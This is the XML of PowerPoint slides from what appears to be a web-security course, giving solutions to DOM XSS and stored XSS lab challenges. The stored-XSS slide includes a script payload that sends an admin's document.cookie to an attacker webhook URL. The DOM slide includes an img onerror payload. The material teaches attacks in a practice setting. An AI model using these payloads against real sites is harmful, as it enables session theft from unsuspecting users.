            <a:ext cx="9054130" cy="354417"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="33" name="Picture 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A641C194-DBD1-43C3-BC52-818CAFA9EEC7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1766281" y="5241998"/>
            <a:ext cx="7892580" cy="354417"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="137440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42106"/>
            <a:ext cx="7850011"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Example – DOM XSS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53916"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" defTabSz="914400" eaLnBrk="1" latinLnBrk="0" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
              </a:rPr>
              <a:t>Example – DOM XSS</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3"/>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9000489" y="6377732"/>
            <a:ext cx="2717380" cy="221561"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="TextBox 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C4A670BD-4775-42AB-9ECC-A2EBC19E5B98}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2982255" y="1441094"/>
            <a:ext cx="6187786" cy="3970318"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://xss.pwnfunction.com </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
              </a:rPr>
              <a:t>Solution to Ma </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
              </a:rPr>
              <a:t>Spaghet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
              </a:rPr>
              <a:t>We can’t use &lt;script&gt;alert(1337)&lt;/script&gt; because the page is already loaded, and the browser only executes JavaScript in &lt;script&gt; when the website is loaded. Instead, we can use something like &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
              </a:rPr>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
              </a:rPr>
              <a:t>=111 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
              </a:rPr>
              <a:t>onerror</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
              </a:rPr>
              <a:t>=alert(1337)&gt;, and this will force the website to look for the image in order to load it, it will error out since “111” isn’t a valid path, and our </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
              </a:rPr>
              <a:t>onerror</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
              </a:rPr>
              <a:t> event attribute will get executed.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IL" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
              <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="255142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FC6D6F-4E9C-868A-98B1-1DA0DDA1F996}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>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311EF23-F64A-C782-28EA-1A8D297A9F1D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="124358" y="138988"/>
            <a:ext cx="11923775" cy="1302106"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E2FE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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="9" name="Straight Connector 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E480B6B1-9BD0-C14D-6C35-046B181B096E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="124358" y="6217920"/>
            <a:ext cx="11923775" cy="731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1EB014-87E6-D8D7-1B7F-97DEF5C4AB55}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="292971" y="542106"/>
            <a:ext cx="7850011" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="24272C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
              </a:rPr>
              <a:t>Example – Stored XSS</a:t>
            </a:r>
            <a:endParaRPr lang="he-IL" sz="3200" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="24272C"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
              <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0A5D91F2-EE24-3166-CD6C-BAFBC797325C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="292971" y="6365895"/>
            <a:ext cx="6097218" cy="246221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
              </a:rPr>
              <a:t>Example – Stored XSS</a:t>
            </a:r>
            <a:endParaRPr lang="en-IL" sz="1000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
              <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9F67AEC4-71D1-89EA-5D3E-E83882E2C956}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9000489" y="6377732"/>
            <a:ext cx="2717380" cy="221561"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="TextBox 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C4A670BD-4775-42AB-9ECC-A2EBC19E5B98}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="619770" y="1580082"/>
            <a:ext cx="11755162" cy="5447645"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://www.root-me.org/fr/Challenges/Web-Client/XSS-Stockee-1 - </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="6000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
              </a:rPr>
              <a:t>Solution:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
              </a:rPr>
              <a:t>The app is vulnerable to stored XSS, as the name suggests. One thing that the description doesn’t mention, is that there’s an admin bot (with high privileges) regularly visiting the website – i.e. executing our XSS code. We need to steal their cookie, so we need our XSS code, that runs on their browser when they view the website to somehow send the cookie to us.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
              </a:rPr>
              <a:t>We can set up a webhook for that (which is just a service that shows us all requests made to it’s URL). There plenty of sites that implement this, one example is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https://webhook.site/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
              </a:rPr>
              <a:t>. So we get the URL it’s providing us, and write something like this as a comment: &lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
              </a:rPr>
              <a:t>window.location</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
              </a:rPr>
              <a:t> = “OUR_URL/” + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
              </a:rPr>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
              </a:rPr>
              <a:t>&lt;/script&gt; - when the admin visits </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
              </a:rPr>
              <a:t>the site, this </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
                <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
              </a:rPr>
              <a:t>will concatenate the admin’s cookies to the URL and navigate to it, triggering our webhook, and we can get the cookie. </a:t>
            </a:r>
            <a:endParaRPr lang="en-IL" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
              <a:cs typeface="Miriam Libre" pitchFamily="2" charset="-79"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1403391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2600</TotalTime>
  <Words>1223</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>122</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Handjet Medium Square Single</vt:lpstr>
      <vt:lpstr>Handjet Square Single</vt:lpstr>
      <vt:lpstr>Miriam Libre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michalu@gmail.com</dc:creator>
  <cp:lastModifiedBy>נתנאל קום</cp:lastModifiedBy>
  <cp:revision>86</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-01-15T09:56:38Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-11-27T09:40:34Z</dcterms:modified>
</cp:coreProperties>
</file>